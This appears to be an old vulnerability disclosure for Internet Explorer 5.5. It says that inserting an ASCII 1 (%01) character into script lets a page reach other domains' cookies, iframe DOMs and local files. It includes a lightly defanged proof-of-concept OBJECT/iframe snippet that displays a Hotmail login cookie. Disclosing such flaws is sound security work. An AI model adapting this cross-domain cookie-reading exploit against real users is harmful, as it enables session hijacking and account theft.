Microsoft Internet Explorer 5.5 ASCII equivalent of "%01" security vulnerability....

The following security vulnerability has been found in
Microsoft Internet Explorer version 5.5
When "
" (an undisplayable character, which is
eaqual to the 1st caharacter in ASCII table - after the
0th…) inserted in some strategic position in
Javascript code ,it is possible to access to local files
or to the IFRAMES DOM, cookies from other
domains etc…

The "
" character also can be replaced by &#01…

The original "%01" bug was found by Georgi Guninski
in various versions of IE and was patched later…
IE5.5 seemed that it is immune to the aforementioned
bug…
But when the transformation done, it reveals
important information…

There is another strange behaviour of IE that I came
across:
When "%01" inserted in a script IE never loads the
page fully, it does not display error message in most
cases either.It seems that it is in an infinite loop
between the task "Load the page" and "Don't load the
page if it contains 'somewhere' '%01'…" This inspired
me that '%01' has still a special meaning to the
newest version of IE…

There are many CODES that can be applied… you
can see them at http://horoznet.com/AlpSinan

Just one of them: this code will access Cookies of
any domain…
(before testing this code replace ! with i in the script
tag)
<OBJECT
classid="clsid:AE24FDAE-03C6-11D1-8B76-
0080C744F389" width="1024" height="500">
<PARAM NAME="URL" value="about:<iframe id=box
src='http://lc2.law5.hotmail.passport.com/cgi-
bin/login' width='800' ></iframe><scr!pt>setTimeout
('alert(\'your cookie from hotmail
\'+box.document.cookie)',10000) </scr!
pt>
http://lc2.law5.hotmail.passport.com/cgi-
bin/login">
</OBJECT>

"I in formed MICROSOFT security team via email but
until now no feedback appeared"

Demonstration can be found at
http://horoznet/AlpSinan

Alp Sinan